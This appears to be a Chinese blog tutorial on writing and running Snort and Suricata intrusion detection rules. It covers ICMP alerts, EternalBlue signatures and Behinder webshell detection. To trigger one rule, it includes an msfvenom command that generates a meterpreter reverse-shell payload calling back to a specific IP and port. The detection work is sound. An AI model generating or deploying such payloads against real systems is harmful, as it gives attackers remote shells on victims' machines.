🎼个人主页:金灰
😎作者简介:一名简单的大一学生;易编橙·终身成长社群的嘉宾.✨
专注网络空间安全服务,期待与您的交流分享~
感谢您的点赞、关注、评论、收藏、是对我最大的认可和支持!❤️
🍊易编橙·终身成长社群🍊 : http://t.csdnimg.cn/iSLaP 期待您的加入~
目录
snort
snort项目官网:
这个项目还是vip香...
Snort - Network Intrusion Detection & Prevention System
snort安装教程:
snort2/snort3:
GitHub - snort3/snort3: Snort++
快速安装: apt install snort
规则写法参考&参数解析:
配置文件,规则写法,使用参数 https://www.cnblogs.com/yuersan/p/15236326.html Snort运行命令中文版_snort命令-CSDN博客 Snort的使用二:入侵检测与规则编写_snort规则的应用-CSDN博客
自写规则--使用
1、ICMP 协议警告-协议
snort -i eth0 -c /etc/snort/snort.conf -A fast -l /var/log/snort
--监听
定义规则监听:
alert icmp any any -> any any (msg:"ICMP test"; gid:1;sid:10000001;rev:1;)
--配置文件
-l 保存到...
任意来,去
====
2、MSF 后门警告-端口
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7799 -f elf >7799.elf
my.rules
include $RULE_PATH/my.rules
snort -i eth0 -c /etc/snort/snort.conf -A fast -l /var/log/snort
alert tcp any 7799 -> any any (msg:"SNORT:visit destport tcp 7799"; sid:201900001; rev:1;)
====
3、识别永恒之蓝-特征
alert smb any any -> $HOME_NET any (msg:“ET EXPLOIT Possible ETERNALBLUE MS17-010”; flow:to_server,established; content:”|00
00 00 31 ff|SMB|2b 00 00 00 00 18 07 c0|”; depth:16;
fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”;
distance:0; flowbits:set,ETPRO.ETERNALBLUE; flowbits:noalert; classtype:trojan-activity; sid:2024220; rev:1;)
suricata
suricata项目
Suricata规则下载
GitHub - ptresearch/AttackDetection: Attack Detection
GitHub - al0ne/suricata-rules: Suricata IDS rules 用来检测红队渗透/恶意行为等,支持检测CobaltStrike/MSF/Empire/DNS隧道/Weevely/菜刀/冰蝎/挖矿/反弹shell/ICMP隧道等 GitHub - ptresearch/AttackDetection: Attack Detection
手册
Suricata User Guide — Suricata 8.0.0-dev documentation
快速安装
apt-get install suricata
测试--使用
1.检测漏洞攻击:MS17010
suricata -c /etc/suricata/suricata.yaml -i eth0 -s /etc/suricata/rules/wannamine.rules
suricata绝对路径 网卡 指向的规则文件(.rules)
--监控开启
=================================
触发--->--查看日志--发现
cat /var/log/suricata/fast.log
日志目录: /var/log/--
=================================
--访问就触发规则
(捕获所有网卡(交换机)下的流量)
2.检测冰蝎后门:
Behinder_v3.0_Beta_6_win 项目 --规则
---------部署到交换机下,所有网络的出口
新版本没有提示--规则要与版本一样呀
检测冰蝎后门:SHELL.PHP
suricata -c /etc/suricata/suricata.yaml -i eth0 -s /etc/suricata/rules/Behinder3.rules
cat /var/log/suricata/fast.log
=====================================================================================
版本 规则
打包系统:securityonion
集成snort/suricata、bro(zeek)、elk、ossec等 Security Onion Solutions